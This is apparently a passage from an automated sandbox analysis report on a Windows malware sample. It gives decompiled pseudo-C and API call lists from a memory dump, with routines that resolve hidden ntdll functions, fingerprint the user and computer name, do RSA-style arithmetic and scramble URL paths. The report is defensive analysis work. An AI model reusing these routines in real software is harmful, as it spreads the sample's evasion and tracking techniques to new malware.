                            • Opcode Fuzzy Hash: 7d8d77f4314e8d86bef9c3c5628921e42b7a05075b066be07520567c4b97a4c8
                            • Instruction Fuzzy Hash: 83310BB5D00349EFDB20DFA5D8849AEBBBABB48344F10496BE502A2351DB309E44DF20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D2AA6(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                            				intOrPtr _v8;
                            				intOrPtr _t23;
                            				intOrPtr _t26;
                            				_Unknown_base(*)()* _t28;
                            				intOrPtr _t30;
                            				_Unknown_base(*)()* _t32;
                            				intOrPtr _t33;
                            				_Unknown_base(*)()* _t35;
                            				intOrPtr _t36;
                            				_Unknown_base(*)()* _t38;
                            				intOrPtr _t39;
                            				_Unknown_base(*)()* _t41;
                            				intOrPtr _t44;
                            				struct HINSTANCE__* _t48;
                            				intOrPtr _t54;
                            
                            				_t54 = E006D7A71(0x20);
                            				if(_t54 == 0) {
                            					_v8 = 8;
                            				} else {
                            					_t23 =  *0x6da348; // 0xdcd5a8
                            					_t1 = _t23 + 0x6db11a; // 0x4c44544e
                            					_t48 = GetModuleHandleA(_t1);
                            					_t26 =  *0x6da348; // 0xdcd5a8
                            					_t2 = _t26 + 0x6db761; // 0x7243775a
                            					_v8 = 0x7f;
                            					_t28 = GetProcAddress(_t48, _t2);
                            					 *(_t54 + 0xc) = _t28;
                            					if(_t28 == 0) {
                            						L8:
                            						E006D789E(_t54);
                            					} else {
                            						_t30 =  *0x6da348; // 0xdcd5a8
                            						_t5 = _t30 + 0x6db74e; // 0x614d775a
                            						_t32 = GetProcAddress(_t48, _t5);
                            						 *(_t54 + 0x10) = _t32;
                            						if(_t32 == 0) {
                            							goto L8;
                            						} else {
                            							_t33 =  *0x6da348; // 0xdcd5a8
                            							_t7 = _t33 + 0x6db771; // 0x6e55775a
                            							_t35 = GetProcAddress(_t48, _t7);
                            							 *(_t54 + 0x14) = _t35;
                            							if(_t35 == 0) {
                            								goto L8;
                            							} else {
                            								_t36 =  *0x6da348; // 0xdcd5a8
                            								_t9 = _t36 + 0x6db4ca; // 0x4e6c7452
                            								_t38 = GetProcAddress(_t48, _t9);
                            								 *(_t54 + 0x18) = _t38;
                            								if(_t38 == 0) {
                            									goto L8;
                            								} else {
                            									_t39 =  *0x6da348; // 0xdcd5a8
                            									_t11 = _t39 + 0x6db786; // 0x6c43775a
                            									_t41 = GetProcAddress(_t48, _t11);
                            									 *(_t54 + 0x1c) = _t41;
                            									if(_t41 == 0) {
                            										goto L8;
                            									} else {
                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                            										_t44 = E006D2156(_t54, _a8);
                            										_v8 = _t44;
                            										if(_t44 != 0) {
                            											goto L8;
                            										} else {
                            											 *_a12 = _t54;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v8;
                            			}

                            APIs
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,006D3C0C,?,?,?,?,00000000,00000000), ref: 006D2ACB
                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 006D2AED
                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 006D2B03
                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 006D2B19
                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 006D2B2F
                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 006D2B45
                              • Part of subcall function 006D2156: memset.NTDLL ref: 006D21D5
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AddressProc$AllocateHandleHeapModulememset
                            • String ID:
                            • API String ID: 1886625739-0
                            • Opcode ID: 61b03412c0d89c1393e5a739d17e19d474aa4c3e33412d789ea2ede95499e068
                            • Instruction ID: 81544117d80934b47da4aad44025f01b6187cfcbdbfb36f618039d4b9ca55d4b
                            • Opcode Fuzzy Hash: 61b03412c0d89c1393e5a739d17e19d474aa4c3e33412d789ea2ede95499e068
                            • Instruction Fuzzy Hash: 5D2139B1D0570BAFD710DF69CC94EAABBEEEB54344712506BE505C7361E7B0E9048BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D3ACA() {
                            				long _v8;
                            				long _v12;
                            				int _v16;
                            				long _t39;
                            				long _t43;
                            				signed int _t47;
                            				short _t51;
                            				signed int _t52;
                            				int _t56;
                            				int _t57;
                            				char* _t64;
                            				short* _t67;
                            
                            				_v16 = 0;
                            				_v8 = 0;
                            				GetUserNameW(0,  &_v8);
                            				_t39 = _v8;
                            				if(_t39 != 0) {
                            					_v12 = _t39;
                            					_v8 = 0;
                            					GetComputerNameW(0,  &_v8);
                            					_t43 = _v8;
                            					if(_t43 != 0) {
                            						_t11 = _t43 + 2; // 0x7491c742
                            						_v12 = _v12 + _t11;
                            						_t64 = E006D7A71(_v12 + _t11 << 2);
                            						if(_t64 != 0) {
                            							_t47 = _v12;
                            							_t67 = _t64 + _t47 * 2;
                            							_v8 = _t47;
                            							if(GetUserNameW(_t67,  &_v8) == 0) {
                            								L7:
                            								E006D789E(_t64);
                            							} else {
                            								_t51 = 0x40;
                            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                            								_t52 = _v8;
                            								_v12 = _v12 - _t52;
                            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                            									goto L7;
                            								} else {
                            									_t56 = _v12 + _v8;
                            									_t31 = _t56 + 2; // 0x6d3764
                            									_v12 = _t56;
                            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                            									_v8 = _t57;
                            									if(_t57 == 0) {
                            										goto L7;
                            									} else {
                            										_t64[_t57] = 0;
                            										_v16 = _t64;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v16;
                            			}

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,006D3762), ref: 006D3ADE
                            • GetComputerNameW.KERNEL32(00000000,006D3762), ref: 006D3AFA
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • GetUserNameW.ADVAPI32(00000000,006D3762), ref: 006D3B34
                            • GetComputerNameW.KERNEL32(006D3762,7491C740), ref: 006D3B57
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,006D3762,00000000,006D3764,00000000,00000000,?,7491C740,006D3762), ref: 006D3B7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                            • String ID:
                            • API String ID: 3850880919-0
                            • Opcode ID: 21bda753f8d3b5b7d704b338016b4aae284eeca0ff75a083c5b86cf61097ba03
                            • Instruction ID: 0df3e6d49b003f0c97e301a6241b2ea9092a2f15bb5718452ed78c33de96fc39
                            • Opcode Fuzzy Hash: 21bda753f8d3b5b7d704b338016b4aae284eeca0ff75a083c5b86cf61097ba03
                            • Instruction Fuzzy Hash: D921C576D00219EFDB11DFE9D989CEEBBBAEE54304B1044ABE501E7340E6309B44DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D262D(void* __ecx, WCHAR* _a4, void* _a8) {
                            				void* _v8;
                            				int _t14;
                            				void* _t18;
                            				int _t25;
                            				int _t29;
                            				int _t34;
                            
                            				_t14 = lstrlenW(_a4);
                            				_t2 =  &_a8; // 0x6d627d
                            				_t29 = _t14;
                            				_t25 = lstrlenW( *_t2);
                            				_t18 = E006D7A71(_t25 + _t29 + _t25 + _t29 + 2);
                            				_v8 = _t18;
                            				if(_t18 != 0) {
                            					_t34 = _t29 + _t29;
                            					memcpy(_t18, _a4, _t34);
                            					_t10 = _t25 + 2; // 0x2
                            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                            				}
                            				return _v8;
                            			}

                            APIs
                            • lstrlenW.KERNEL32(004F0053,?,74CB5520,00000008,014A93CC,?,006D627D,004F0053,014A93CC,?,?,?,?,?,?,006D521B), ref: 006D263D
                            • lstrlenW.KERNEL32(}bmS,?,006D627D,004F0053,014A93CC,?,?,?,?,?,?,006D521B), ref: 006D2644
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • memcpy.NTDLL(00000000,?,74CB69A0,?,?,006D627D,004F0053,014A93CC,?,?,?,?,?,?,006D521B), ref: 006D2664
                            • memcpy.NTDLL(74CB69A0,?,00000002,00000000,?,74CB69A0,?,?,006D627D,004F0053,014A93CC), ref: 006D2677
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrlenmemcpy$AllocateHeap
                            • String ID: }bmS
                            • API String ID: 2411391700-3514019255
                            • Opcode ID: ac323df51d2827024acb8b16c149911ca13db0deff87fe6f9370ee51fe3cd00d
                            • Instruction ID: 6c00fe08930e2e4aad446c64074c65edeced642db76e6bc61524d8e3f274ed1a
                            • Opcode Fuzzy Hash: ac323df51d2827024acb8b16c149911ca13db0deff87fe6f9370ee51fe3cd00d
                            • Instruction Fuzzy Hash: EBF03736D00129BB8F11ABA8CC85CDE7BADEF083947054067BA0497312E631EA108BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D2D54(intOrPtr _a4) {
                            				void* _t2;
                            				unsigned int _t4;
                            				void* _t5;
                            				long _t6;
                            				void* _t7;
                            				void* _t15;
                            
                            				_t2 = CreateEventA(0, 1, 0, 0);
                            				 *0x6da30c = _t2;
                            				if(_t2 == 0) {
                            					return GetLastError();
                            				}
                            				_t4 = GetVersion();
                            				if(_t4 != 5) {
                            					L4:
                            					if(_t15 <= 0) {
                            						_t5 = 0x32;
                            						return _t5;
                            					}
                            					L5:
                            					 *0x6da2fc = _t4;
                            					_t6 = GetCurrentProcessId();
                            					 *0x6da2f8 = _t6;
                            					 *0x6da304 = _a4;
                            					_t7 = OpenProcess(0x10047a, 0, _t6);
                            					 *0x6da2f4 = _t7;
                            					if(_t7 == 0) {
                            						 *0x6da2f4 =  *0x6da2f4 | 0xffffffff;
                            					}
                            					return 0;
                            				}
                            				if(_t4 >> 8 > 0) {
                            					goto L5;
                            				}
                            				_t15 = _t4 - _t4;
                            				goto L4;
                            			}

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,006D72F1,?), ref: 006D2D5C
                            • GetVersion.KERNEL32 ref: 006D2D6B
                            • GetCurrentProcessId.KERNEL32 ref: 006D2D87
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 006D2DA4
                            • GetLastError.KERNEL32 ref: 006D2DC3
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                            • String ID:
                            • API String ID: 2270775618-0
                            • Opcode ID: 28764ad30994eb7aa1302a7353cb4d752cb6a311d8f133c51c4d3fb2559fb60a
                            • Instruction ID: d39fb16d9505fded6ac71396cfdc1152362a48ebcfd644024588cd05931698c2
                            • Opcode Fuzzy Hash: 28764ad30994eb7aa1302a7353cb4d752cb6a311d8f133c51c4d3fb2559fb60a
                            • Instruction Fuzzy Hash: 93F0C230E463039BD7205F66AC29BA43B73AB24B01F14641FE552C63E4D7708581CB26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(?), ref: 006D1370
                            • SysFreeString.OLEAUT32(00000000), ref: 006D1455
                              • Part of subcall function 006D55F9: SysAllocString.OLEAUT32(006D9284), ref: 006D5649
                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 006D14A8
                            • SysFreeString.OLEAUT32(00000000), ref: 006D14B7
                              • Part of subcall function 006D43F6: Sleep.KERNEL32(000001F4), ref: 006D443E
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                            • String ID:
                            • API String ID: 3193056040-0
                            • Opcode ID: f1bc74ff0f339d5d92a629a6a9cda2918344d8c544353d63ad6bb16af86b0922
                            • Instruction ID: b149a01bc9d4320545f69e1b0a52c8d0655e44b49961efef5a72f5d801a43b51
                            • Opcode Fuzzy Hash: f1bc74ff0f339d5d92a629a6a9cda2918344d8c544353d63ad6bb16af86b0922
                            • Instruction Fuzzy Hash: 31513A35900609BFDB01CFA8D944AEEB7B7BF89700B15882AE915DB320EB71ED45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E006D55F9(intOrPtr* __eax) {
                            				void* _v8;
                            				WCHAR* _v12;
                            				void* _v16;
                            				char _v20;
                            				void* _v24;
                            				intOrPtr _v28;
                            				void* _v32;
                            				intOrPtr _v40;
                            				short _v48;
                            				intOrPtr _v56;
                            				short _v64;
                            				intOrPtr* _t54;
                            				intOrPtr* _t56;
                            				intOrPtr _t57;
                            				intOrPtr* _t58;
                            				intOrPtr* _t60;
                            				void* _t61;
                            				intOrPtr* _t63;
                            				intOrPtr* _t65;
                            				short _t67;
                            				intOrPtr* _t68;
                            				intOrPtr* _t70;
                            				intOrPtr* _t72;
                            				intOrPtr* _t75;
                            				intOrPtr* _t77;
                            				intOrPtr _t79;
                            				intOrPtr* _t83;
                            				intOrPtr* _t87;
                            				intOrPtr _t103;
                            				intOrPtr _t109;
                            				void* _t118;
                            				void* _t122;
                            				void* _t123;
                            				intOrPtr _t130;
                            
                            				_t123 = _t122 - 0x3c;
                            				_push( &_v8);
                            				_push(__eax);
                            				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                            				if(_t118 >= 0) {
                            					_t54 = _v8;
                            					_t103 =  *0x6da348; // 0xdcd5a8
                            					_t5 = _t103 + 0x6db038; // 0x3050f485
                            					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                            					_t56 = _v8;
                            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                            					if(_t118 >= 0) {
                            						__imp__#2(0x6d9284);
                            						_v28 = _t57;
                            						if(_t57 == 0) {
                            							_t118 = 0x8007000e;
                            						} else {
                            							_t60 = _v32;
                            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                            							_t87 = __imp__#6;
                            							_t118 = _t61;
                            							if(_t118 >= 0) {
                            								_t63 = _v24;
                            								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                            								if(_t118 >= 0) {
                            									_t130 = _v20;
                            									if(_t130 != 0) {
                            										_t67 = 3;
                            										_v64 = _t67;
                            										_v48 = _t67;
                            										_v56 = 0;
                            										_v40 = 0;
                            										if(_t130 > 0) {
                            											while(1) {
                            												_t68 = _v24;
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												_t123 = _t123;
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                            												if(_t118 < 0) {
                            													goto L16;
                            												}
                            												_t70 = _v8;
                            												_t109 =  *0x6da348; // 0xdcd5a8
                            												_t28 = _t109 + 0x6db0bc; // 0x3050f1ff
                            												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                            												if(_t118 >= 0) {
                            													_t75 = _v16;
                            													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                            													if(_t118 >= 0 && _v12 != 0) {
                            														_t79 =  *0x6da348; // 0xdcd5a8
                            														_t33 = _t79 + 0x6db078; // 0x76006f
                            														if(lstrcmpW(_v12, _t33) == 0) {
                            															_t83 = _v16;
                            															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                            														}
                            														 *_t87(_v12);
                            													}
                            													_t77 = _v16;
                            													 *((intOrPtr*)( *_t77 + 8))(_t77);
                            												}
                            												_t72 = _v8;
                            												 *((intOrPtr*)( *_t72 + 8))(_t72);
                            												_v40 = _v40 + 1;
                            												if(_v40 < _v20) {
                            													continue;
                            												}
                            												goto L16;
                            											}
                            										}
                            									}
                            								}
                            								L16:
                            								_t65 = _v24;
                            								 *((intOrPtr*)( *_t65 + 8))(_t65);
                            							}
                            							 *_t87(_v28);
                            						}
                            						_t58 = _v32;
                            						 *((intOrPtr*)( *_t58 + 8))(_t58);
                            					}
                            				}
                            				return _t118;
                            			}

                            APIs
                            • SysAllocString.OLEAUT32(006D9284), ref: 006D5649
                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 006D572A
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5743
                            • SysFreeString.OLEAUT32(?), ref: 006D5772
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$Free$Alloclstrcmp
                            • String ID:
                            • API String ID: 1885612795-0
                            • Opcode ID: cc72916c5c493e2c034dee70c34841dafb0c8f7f7e5114ba8f742c44939eee3b
                            • Instruction ID: 4500bd2c686e74480fbf0fdfa412cae28ea5163cc02bc1f6025eef3485f6b1c6
                            • Opcode Fuzzy Hash: cc72916c5c493e2c034dee70c34841dafb0c8f7f7e5114ba8f742c44939eee3b
                            • Instruction Fuzzy Hash: 38513E75D00609EFCB00DFA8C888DAEB7B6FF88705B254599E916EB324D7719D41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E006D19D1(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				void _v156;
                            				void _v428;
                            				void* _t55;
                            				unsigned int _t56;
                            				signed int _t66;
                            				signed int _t74;
                            				void* _t76;
                            				signed int _t79;
                            				void* _t81;
                            				void* _t92;
                            				void* _t96;
                            				signed int* _t99;
                            				signed int _t101;
                            				signed int _t103;
                            				void* _t107;
                            
                            				_t92 = _a12;
                            				_t101 = __eax;
                            				_t55 = E006D43E5(_a16, _t92);
                            				_t79 = _t55;
                            				if(_t79 == 0) {
                            					L18:
                            					return _t55;
                            				}
                            				_t56 =  *(_t92 + _t79 * 4 - 4);
                            				_t81 = 0;
                            				_t96 = 0x20;
                            				if(_t56 == 0) {
                            					L4:
                            					_t97 = _t96 - _t81;
                            					_v12 = _t96 - _t81;
                            					E006D17D5(_t79,  &_v428);
                            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E006D4376(_t101,  &_v428, _a8, _t96 - _t81);
                            					E006D4376(_t79,  &_v156, _a12, _t97);
                            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                            					_t66 = E006D17D5(_t101, 0x6da1d0);
                            					_t103 = _t101 - _t79;
                            					_a8 = _t103;
                            					if(_t103 < 0) {
                            						L17:
                            						E006D17D5(_a16, _a4);
                            						E006D71DF(_t79,  &_v428, _a4, _t97);
                            						memset( &_v428, 0, 0x10c);
                            						_t55 = memset( &_v156, 0, 0x84);
                            						goto L18;
                            					}
                            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                            					do {
                            						if(_v8 != 0xffffffff) {
                            							_push(1);
                            							_push(0);
                            							_push(0);
                            							_push( *_t99);
                            							L006D82AA();
                            							_t74 = _t66 +  *(_t99 - 4);
                            							asm("adc edx, esi");
                            							_push(0);
                            							_push(_v8 + 1);
                            							_push(_t92);
                            							_push(_t74);
                            							L006D82A4();
                            							if(_t92 > 0 || _t74 > 0xffffffff) {
                            								_t74 = _t74 | 0xffffffff;
                            								_v16 = _v16 & 0x00000000;
                            							}
                            						} else {
                            							_t74 =  *_t99;
                            						}
                            						_t106 = _t107 + _a8 * 4 - 0x1a8;
                            						_a12 = _t74;
                            						_t76 = E006D3506(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                            						while(1) {
                            							 *_t99 =  *_t99 - _t76;
                            							if( *_t99 != 0) {
                            								goto L14;
                            							}
                            							L13:
                            							_t92 =  &_v156;
                            							if(E006D5422(_t79, _t92, _t106) < 0) {
                            								break;
                            							}
                            							L14:
                            							_a12 = _a12 + 1;
                            							_t76 = E006D4CD2(_t79,  &_v156, _t106, _t106);
                            							 *_t99 =  *_t99 - _t76;
                            							if( *_t99 != 0) {
                            								goto L14;
                            							}
                            							goto L13;
                            						}
                            						_a8 = _a8 - 1;
                            						_t66 = _a12;
                            						_t99 = _t99 - 4;
                            						 *(0x6da1d0 + _a8 * 4) = _t66;
                            					} while (_a8 >= 0);
                            					_t97 = _v12;
                            					goto L17;
                            				}
                            				while(_t81 < _t96) {
                            					_t81 = _t81 + 1;
                            					_t56 = _t56 >> 1;
                            					if(_t56 != 0) {
                            						continue;
                            					}
                            					goto L4;
                            				}
                            				goto L4;
                            			}

                            APIs
                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 006D1A84
                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 006D1A9A
                            • memset.NTDLL ref: 006D1B43
                            • memset.NTDLL ref: 006D1B59
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memset$_allmul_aulldiv
                            • String ID:
                            • API String ID: 3041852380-0
                            • Opcode ID: 3b64df5704e500bb0c2845f99a4f44afe3a0d0033d78f7647ff6618e4960c9df
                            • Instruction ID: bd15ac6f1c9e72d098565fdd439abb86c951dc2d1087d3aa5681b93564d5f8ab
                            • Opcode Fuzzy Hash: 3b64df5704e500bb0c2845f99a4f44afe3a0d0033d78f7647ff6618e4960c9df
                            • Instruction Fuzzy Hash: AD41BF31E01219BFDB509F68CC85BDE7776EF86310F04456BB8099B381EBB09E548B81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E006D6643(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                            				intOrPtr _v8;
                            				void* _v12;
                            				void* _v16;
                            				intOrPtr _t26;
                            				intOrPtr* _t28;
                            				intOrPtr _t31;
                            				intOrPtr* _t32;
                            				void* _t39;
                            				int _t46;
                            				intOrPtr* _t47;
                            				int _t48;
                            
                            				_t47 = __eax;
                            				_push( &_v12);
                            				_push(__eax);
                            				_t39 = 0;
                            				_t46 = 0;
                            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                            				_v8 = _t26;
                            				if(_t26 < 0) {
                            					L13:
                            					return _v8;
                            				}
                            				if(_v12 == 0) {
                            					Sleep(0xc8);
                            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                            				}
                            				if(_v8 >= _t39) {
                            					_t28 = _v12;
                            					if(_t28 != 0) {
                            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                            						_v8 = _t31;
                            						if(_t31 >= 0) {
                            							_t46 = lstrlenW(_v16);
                            							if(_t46 != 0) {
                            								_t46 = _t46 + 1;
                            								_t48 = _t46 + _t46;
                            								_t39 = E006D7A71(_t48);
                            								if(_t39 == 0) {
                            									_v8 = 0x8007000e;
                            								} else {
                            									memcpy(_t39, _v16, _t48);
                            								}
                            								__imp__#6(_v16);
                            							}
                            						}
                            						_t32 = _v12;
                            						 *((intOrPtr*)( *_t32 + 8))(_t32);
                            					}
                            					 *_a4 = _t39;
                            					 *_a8 = _t46 + _t46;
                            				}
                            				goto L13;
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeSleepStringlstrlenmemcpy
                            • String ID:
                            • API String ID: 1198164300-0
                            • Opcode ID: 7d3ade1ce1ab53469be01c29c8c65ef43ba06fa92b1e1b5614ff15e65b88bd2b
                            • Instruction ID: eb39d04b89b173a5e73ea63aae26bf2d036caea0889b02ee2160d18782b22b34
                            • Opcode Fuzzy Hash: 7d3ade1ce1ab53469be01c29c8c65ef43ba06fa92b1e1b5614ff15e65b88bd2b
                            • Instruction Fuzzy Hash: D4212C75D01259EFCB11DFA4D98499EBBBAEF49340B2081AAF901E7310E730DA01CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E006D5454(unsigned int __eax, void* __ecx) {
                            				void* _v8;
                            				void* _v12;
                            				signed int _t21;
                            				signed short _t23;
                            				char* _t27;
                            				void* _t29;
                            				void* _t30;
                            				unsigned int _t33;
                            				void* _t37;
                            				unsigned int _t38;
                            				void* _t41;
                            				void* _t42;
                            				int _t45;
                            				void* _t46;
                            
                            				_t42 = __eax;
                            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                            				_t38 = __eax;
                            				_t30 = RtlAllocateHeap( *0x6da2d8, 0, (__eax >> 3) + __eax + 1);
                            				_v12 = _t30;
                            				if(_t30 != 0) {
                            					_v8 = _t42;
                            					do {
                            						_t33 = 0x18;
                            						if(_t38 <= _t33) {
                            							_t33 = _t38;
                            						}
                            						_t21 =  *0x6da2f0; // 0x6d9bfead
                            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                            						 *0x6da2f0 = _t23;
                            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                            						memcpy(_t30, _v8, _t45);
                            						_v8 = _v8 + _t45;
                            						_t27 = _t30 + _t45;
                            						_t38 = _t38 - _t45;
                            						_t46 = _t46 + 0xc;
                            						 *_t27 = 0x2f;
                            						_t13 = _t27 + 1; // 0x1
                            						_t30 = _t13;
                            					} while (_t38 > 8);
                            					memcpy(_t30, _v8, _t38 + 1);
                            				}
                            				return _v12;
                            			}

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,006D2314,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D545F
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 006D5477
                            • memcpy.NTDLL(00000000,014A9600,-00000008,?,?,?,006D2314,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D54BB
                            • memcpy.NTDLL(00000001,014A9600,00000001,006D3831,00000000,014A9600), ref: 006D54DC
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
